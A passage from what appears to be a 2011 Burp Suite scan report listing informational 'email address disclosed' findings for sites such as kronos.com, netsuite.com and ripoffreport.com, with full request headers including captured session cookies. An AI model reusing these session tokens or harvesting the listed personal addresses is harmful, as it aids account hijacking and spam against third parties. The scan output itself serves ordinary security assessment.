var OperatorOfflineImageSrc = "http://www.instantengage.com/images_store/set6_2.gif";
var OperatorOfflineEmailAddress = "alan@integritydefender.com";
var OperatorOfflineEmailSubject = "Enquires for Integrity Defenders";
//-->
...[SNIP]...
27.48. http://www.kayako.com/js/cookie.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kayako.com
Path:   /js/cookie.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/cookie.js HTTP/1.1
Host: www.kayako.com
Proxy-Connection: keep-alive
Referer: http://www.kayako.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km__last_visit=988416873; km__last_activity=1303776873; km__tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:14:34 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 19 Oct 2010 03:59:08 GMT
ETag: "3350794-b6b-492f0508bfb00"
Accept-Ranges: bytes
Content-Length: 2923
Connection: close
Content-Type: application/x-javascript

/**
* @author    Maxime Haineault (max@centdessin.com)
* @version    0.3
* @desc    JavaScript cookie manipulation class
*
*/

Cookie = {    

   /** Get a cookie's value
    *
    * @param integer    key        The token used to create the cookie
    * @return void
    */

...[SNIP]...
27.49. http://www.kronos.com/kronos-site-usage-privacy-policy.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kronos.com
Path:   /kronos-site-usage-privacy-policy.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /kronos-site-usage-privacy-policy.aspx HTTP/1.1
Host: www.kronos.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.kronos.com&SiteLanguage=1033; EktGUID=09aa79d0-673f-4609-b21e-7d9f4c9303d4; EkAnalytics=newuser; KRONOS_PUBLIC_US=oLbiTnpP6Si6kOk_DB7jFLNPiaC_Ce4w_I3BqCTnnw8TKWxdHCNaWZCIwvL0jHFbx-CJ_B7N8OAFc2s2P32q9I3r8vBB6mRCf7d9OEqeKNcwx6_MGW_2YzYMKIayfawPjXY5248iYocxSIZ_gu-1z8fF49vaXn80g8D6fyxIiYbbHFSz0; ASP.NET_SessionId=zoqftdbukjhn1b55hrsfjqnv; s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fcspersistslider1=6; mbox=session#1303738433760-48782#1303740624|check#true#1303738824; s_cc=true; s_nr=1303738765059; s_invisit=true; s_lv=1303738765060; s_lv_s=First%20Visit; s_gpv_page=kronos%3Acustomer-support-login.aspx; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.3.10.1303738437

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 25 Apr 2011 13:51:36 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 59619


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="ctl00_ctl00_html1" xmlns="http://www.w3.org/1999/xhtml" lang="e
...[SNIP]...
<a href="mailto:webmaster@kronos.com">webmaster@kronos.com</a>
...[SNIP]...
27.50. http://www.manageengine.com/me_partners.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.manageengine.com
Path:   /me_partners.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /me_partners.html HTTP/1.1
Host: www.manageengine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.12.10.1303732848

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:13:56 GMT
Server: Apache
Last-Modified: Wed, 20 Apr 2011 05:36:02 GMT
ETag: "320aa-4a153000c3480"
Accept-Ranges: bytes
Cache-Control: max-age=604800
Expires: Mon, 02 May 2011 12:13:56 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 204970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Templ
...[SNIP]...
<br />
rino@itinfosec.com<br />
...[SNIP]...
<br />
sales@itinfosec.com <br />
support@itinfosec.com <br />
...[SNIP]...
<br />
Phone : prasad@gammainfowayexalt.com</p>
...[SNIP]...
<br />
Email ID: dragon@kisang.co.kr / mpark@kisang.co.kr
<br />
...[SNIP]...
27.51. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketgid.com
Path:   /pnews/773204/i/7269/pp/2/1/

Issue detail

The following email address was disclosed in the response:

Request

GET /pnews/773204/i/7269/pp/2/1/ HTTP/1.1
Host: www.marketgid.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MGformStatus=2; __utma=250877338.2141066310.1303423654.1303423654.1303423654.1; __utmz=250877338.1303423654.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/14|utmcmd=referral; __gads=ID=909f464f6199feed:T=1303423666:S=ALNI_MY6fIaxdoRzO_fDyTrK1Li9f5G69A; __qca=P0-972785183-1303423664935

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:31:32 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=20
Cache-Control: no-cache, must-revalidate
Content-Length: 48728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<!--Rating@Mail.ru COUNTEr-->
...[SNIP]...
27.52. http://www.myreputationmanager.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myreputationmanager.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.myreputationmanager.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=181295291.1303691653.1.1.utmgclid=CNrfy-W1tqgCFYje4AodAk7yCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=181295291.1597869074.1303691653.1303691653.1303691653.1

Response

HTTP/1.1 200 OK
Content-Length: 46255
Content-Type: text/html
Content-Location: http://www.myreputationmanager.com/Index.html
Last-Modified: Wed, 23 Feb 2011 01:42:44 GMT
Accept-Ranges: bytes
ETag: "54c233f7fad2cb1:aee"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 16:03:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso
...[SNIP]...
<a href="mailto:sales@myreputationmanager.com"><a href="mailto:sales@myreputationmanager.com">
...[SNIP]...
27.53. http://www.myreputationmanager.com/faq.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myreputationmanager.com
Path:   /faq.html

Issue detail

The following email address was disclosed in the response:

Request

GET /faq.html HTTP/1.1
Host: www.myreputationmanager.com
Proxy-Connection: keep-alive
Referer: http://www.myreputationmanager.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=181295291.1303691653.1.1.utmgclid=CNrfy-W1tqgCFYje4AodAk7yCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=181295291.1597869074.1303691653.1303691653.1303747431.2; __utmc=181295291; __utmb=181295291.1.10.1303747431

Response

HTTP/1.1 200 OK
Content-Length: 39582
Content-Type: text/html
Last-Modified: Wed, 23 Feb 2011 01:43:09 GMT
Accept-Ranges: bytes
ETag: "88391f6fbd2cb1:aee"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 16:23:14 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/templates/temp.dwt" codeOutsideHTMLIsLocked="false" -->
<h
...[SNIP]...
<a href="mailto:sales@myreputationmanager.com">
...[SNIP]...
27.54. http://www.myreputationmanager.com/request_analysis.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myreputationmanager.com
Path:   /request_analysis.html

Issue detail

The following email address was disclosed in the response:

Request

GET /request_analysis.html HTTP/1.1
Host: www.myreputationmanager.com
Proxy-Connection: keep-alive
Referer: http://www.myreputationmanager.com/faq.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=181295291.1303691653.1.1.utmgclid=CNrfy-W1tqgCFYje4AodAk7yCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=181295291.1597869074.1303691653.1303691653.1303747431.2; __utmc=181295291; __utmb=181295291.2.10.1303747431

Response

HTTP/1.1 200 OK
Content-Length: 34772
Content-Type: text/html
Last-Modified: Wed, 23 Feb 2011 01:38:33 GMT
Accept-Ranges: bytes
ETag: "c842e961fad2cb1:aee"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 16:23:19 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<ti
...[SNIP]...
<a href="mailto:sales@myreputationmanager.com">
...[SNIP]...
27.55. http://www.myreputationmanager.com/script/jsvalidations.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myreputationmanager.com
Path:   /script/jsvalidations.js

Issue detail

The following email address was disclosed in the response:

Request

GET /script/jsvalidations.js HTTP/1.1
Host: www.myreputationmanager.com
Proxy-Connection: keep-alive
Referer: http://www.myreputationmanager.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=181295291.1303691653.1.1.utmgclid=CNrfy-W1tqgCFYje4AodAk7yCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=181295291.1597869074.1303691653.1303691653.1303691653.1

Response

HTTP/1.1 200 OK
Content-Length: 11301
Content-Type: application/x-javascript
Last-Modified: Tue, 04 Jan 2011 11:16:44 GMT
Accept-Ranges: bytes
ETag: "aabfabde0accb1:aee"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 16:03:37 GMT


//**************************************************************************
// To chk which explorer client has

var isNS4 = (navigator.appName=="Netscape")?1:0;

function chkKeypress(evt)    //c
...[SNIP]...
string represents an atom (basically a series of non-special characters.) */
       var atom=validChars + '+';

       /* The following string represents one word in the typical username.
       For example, in john.doe@somewhere.com, john and doe are words.
       Basically, a word is either an atom or quoted string. */
       var word="(" + atom + "|" + quotedUser + ")";

       // The following pattern describes the structure of the user
...[SNIP]...
27.56. http://www.netsuite.com/portal/javascript/DD_roundies.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netsuite.com
Path:   /portal/javascript/DD_roundies.js

Issue detail

The following email address was disclosed in the response:

Request

GET /portal/javascript/DD_roundies.js HTTP/1.1
Host: www.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/products/ecommerce/website-hosting.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NS_VER=2011.1.0; __utmz=1.1303742452.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=k23zN1HJzNw2PWHTMzr6q1LqT1Q41y9Tz2M0V9JvpTH0mJ5TfxDLbGQpDm2qpc2ThmqSMyK39KWhLDnCtK6fYxHWtxqSfGGZGG53PyJw5wXyXYk1y7kppJz4hQqHll7q!-577847599; NLVisitorId=rcHW8495Af7oGhFy; NLShopperId=rcHW8495AQLpGtOI; bn_u=6923519460848807096; __utma=1.1781939456.1303742452.1303742452.1303742452.1; __utmc=1; __utmb=1.5.10.1303742452; mbox=session#1303736347554-914602#1303745022|PC#1303736347554-914602.17#1304952762|check#true#1303743222; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fpage_not_found.shtml%22%2C%22r%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fpages%2Fportal%2Fpage_not_found.jspinternal%3DT%22%2C%22t%22%3A1303743275975%2C%22u%22%3A%226923519460848807096%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fproducts%2Fecommerce%2Fwebsite-hosting.shtml%22%2C%22l%22%3A%22Ecommerce%20-%20SEO%22%2C%22de%22%3A%7B%22su%22%3A%22NetSuite%20for%20mid-sized%20businesses%20adds%20advanced%20accounting%2C%20customer%20relationship%20management%2C%20and%20SFA%20to%20the%20NetSuite%20family.%20Includes%3A%20NetSuite%20Accounting%2C%20NetSuite%20CRM%2C%20NetSuite%20SFA%2C%20NetSuite%20Knowledge%20Base%2C%20and%20NetSuite%20Vendor%20Center.%22%2C%22ti%22%3A%22NetSuite%20%7C%20Form%22%2C%22nw%22%3A173%2C%22nl%22%3A46%7D%7D

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 16853
Content-Disposition: inline;filename="DD_roundies.js"
NS_RTIMER_COMPOSITE: -1584260967:73686F702D6A6176613031312E7376616C652E6E65746C65646765722E636F6D:80
NLCacheNote: FromMediaCache=T
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Content-Type: application/octet-stream; charset=UTF-8
Cache-Control: max-age=2390
Date: Mon, 25 Apr 2011 14:54:25 GMT
Connection: close

/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.diller@gmail.com
* URL: http://www.dillerdesign.com/experiment/DD_roundies/
* Version: 0.0.2a
* Licensed under the MIT License: http://dillerdesign.com/experiment/DD_roundies/#license
*
* Usage:
* DD_roundies.ad
...[SNIP]...
27.57. http://www.praetorian.com/contactus.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.praetorian.com
Path:   /contactus.html

Issue detail

The following email address was disclosed in the response:

Request

GET /contactus.html HTTP/1.1
Host: www.praetorian.com
Proxy-Connection: keep-alive
Referer: http://www.praetorian.com/external-network-penetration-test.html?gclid=CO7VhZ_Pt6gCFaNd5Qodk1B4BQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=116139463.1303735969.2.2.utmgclid=CO7VhZ_Pt6gCFaNd5Qodk1B4BQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=116139463.239124078.1303732836.1303732836.1303735969.2; __utmc=116139463; __utmb=116139463.1.10.1303735969

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:09:55 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 17907
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<a href="mailto:info@praetorian.com">info@praetorian.com</a>
...[SNIP]...
<a href="mailto:info@praetorian.com">info@praetorian.com</a>
...[SNIP]...
27.58. http://www.removeyourname.com/company/contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.removeyourname.com
Path:   /company/contact.html

Issue detail

The following email address was disclosed in the response:

Request

GET /company/contact.html HTTP/1.1
Host: www.removeyourname.com
Proxy-Connection: keep-alive
Referer: http://www.removeyourname.com/rip_off_report.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=136832947.1303747413.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=136832947.1526791206.1303747413.1303747413.1303747413.1; __utmc=136832947; __utmb=136832947.6.10.1303747413

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:26:55 GMT
Server: Apache
Last-Modified: Wed, 16 Mar 2011 01:01:49 GMT
ETag: "a4314-38bd-49e8f16ed3940"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 14525

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="mailto:info@removeyourname.com">info@removeyourname.com</a>
...[SNIP]...
27.59. http://www.reputationprofessor.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reputationprofessor.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.reputationprofessor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Behavior
Date: Mon, 25 Apr 2011 16:03:59 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7e mod_auth_pgsql/2.0.3
X-Powered-By: PHP/4.4.9
Connection: close
Content-Type: text/html
Content-Length: 887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--< html xmlns="http://www.w3.org/1999/xhtml">-->
<head>
<title>HTTP Error 4
...[SNIP]...
<a href="mailto:reputationprofessor+nospam@nospam.gmail.com">
...[SNIP]...
27.60. http://www.ripoffreport.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ripoffreport.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.ripoffreport.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 16:19:28 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Cache-Control: public, max-age=600
Expires: Mon, 25 Apr 2011 16:16:01 GMT
Last-Modified: Mon, 25 Apr 2011 16:06:01 GMT
X-AspNet-Version: 2.0.50727
ROR-NODE: 04
Content-Length: 150246


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"
...[SNIP]...
<a href="mailto:arbitration@ripoffreport.com">arbitration@ripoffreport.com</a>
...[SNIP]...
<a href="mailto:EDitor@ripoffreport.com">
...[SNIP]...
<a href="mailto:ClassAction@ripoffreport.com">ClassAction@RipoffReport.com</a>
...[SNIP]...
<a href="mailto:editor@ripoffreport.com?subject=Top%20Rip-off%20Links%20Request&amp;body=Please%20add%20the%20following%20company%20or%20individual%20to%20the%20Top%20Rip-off%20Links%20list.">EDitor@RipoffReport.com</a>
...[SNIP]...
<a href="mailto:EDitor@ripoffreport.com">
...[SNIP]...
27.61. http://www.ripoffreport.com/Common/script/jquery.hoverIntent.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ripoffreport.com
Path:   /Common/script/jquery.hoverIntent.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Common/script/jquery.hoverIntent.js HTTP/1.1
Host: www.ripoffreport.com
Proxy-Connection: keep-alive
Referer: http://www.ripoffreport.com/ConsumerResources.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=38277280.1303747675.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=38277280.797691246.1303747675.1303747675.1303747675.1; __utmc=38277280; __utmb=38277280.1.10.1303747675

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 16:25:10 GMT
Content-Type: application/x-javascript; charset=win-utf
Connection: keep-alive
Last-Modified: Wed, 08 Jul 2009 00:03:11 GMT
ETag: "cc70807b5fffc91:0"
ROR-NODE: 15
Content-Length: 4713

/**
* hoverIntent is similar to jQuery's built-in "hover" function except that
* instead of firing the onMouseOver event immediately, hoverIntent checks
* to see if the user's mouse has slowed down
...[SNIP]...
<brian@cherne.net>
...[SNIP]...
27.62. http://www.ripoffreport.com/ConsumerResources.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ripoffreport.com
Path:   /ConsumerResources.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /ConsumerResources.aspx HTTP/1.1
Host: www.ripoffreport.com
Proxy-Connection: keep-alive
Referer: http://www.ripoffreport.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=38277280.1303747675.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=38277280.797691246.1303747675.1303747675.1303747675.1; __utmc=38277280; __utmb=38277280.1.10.1303747675

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 16:25:07 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Cache-Control: public, max-age=345600
Expires: Tue, 26 Apr 2011 05:08:43 GMT
Last-Modified: Fri, 22 Apr 2011 05:08:43 GMT
X-AspNet-Version: 2.0.50727
ROR-NODE: 16
Content-Length: 61937


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"
...[SNIP]...
<a href="mailto:EDitor@ripoffreport.com">
...[SNIP]...
27.63. http://www.ripoffreport.com/CorporateAdvocacy.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ripoffreport.com
Path:   /CorporateAdvocacy.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /CorporateAdvocacy.aspx HTTP/1.1
Host: www.ripoffreport.com
Proxy-Connection: keep-alive
Referer: http://www.ripoffreport.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=38277280.1303747675.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=38277280.797691246.1303747675.1303747675.1303747675.1; __utmc=38277280; __utmb=38277280.1.10.1303747675

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 16:25:02 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Cache-Control: public, max-age=345600
Expires: Tue, 26 Apr 2011 06:06:05 GMT
Last-Modified: Fri, 22 Apr 2011 06:06:05 GMT
X-AspNet-Version: 2.0.50727
ROR-NODE: 12
Content-Length: 32784


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_Head1"
...[SNIP]...
<a href="mailto:EDitor@ripoffreport.com">
...[SNIP]...
27.64. http://www.ripoffreport.com/LoginPage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ripoffreport.com
Path:   /LoginPage.aspx

Issue detail

The following email address was disclosed in the response:

Request

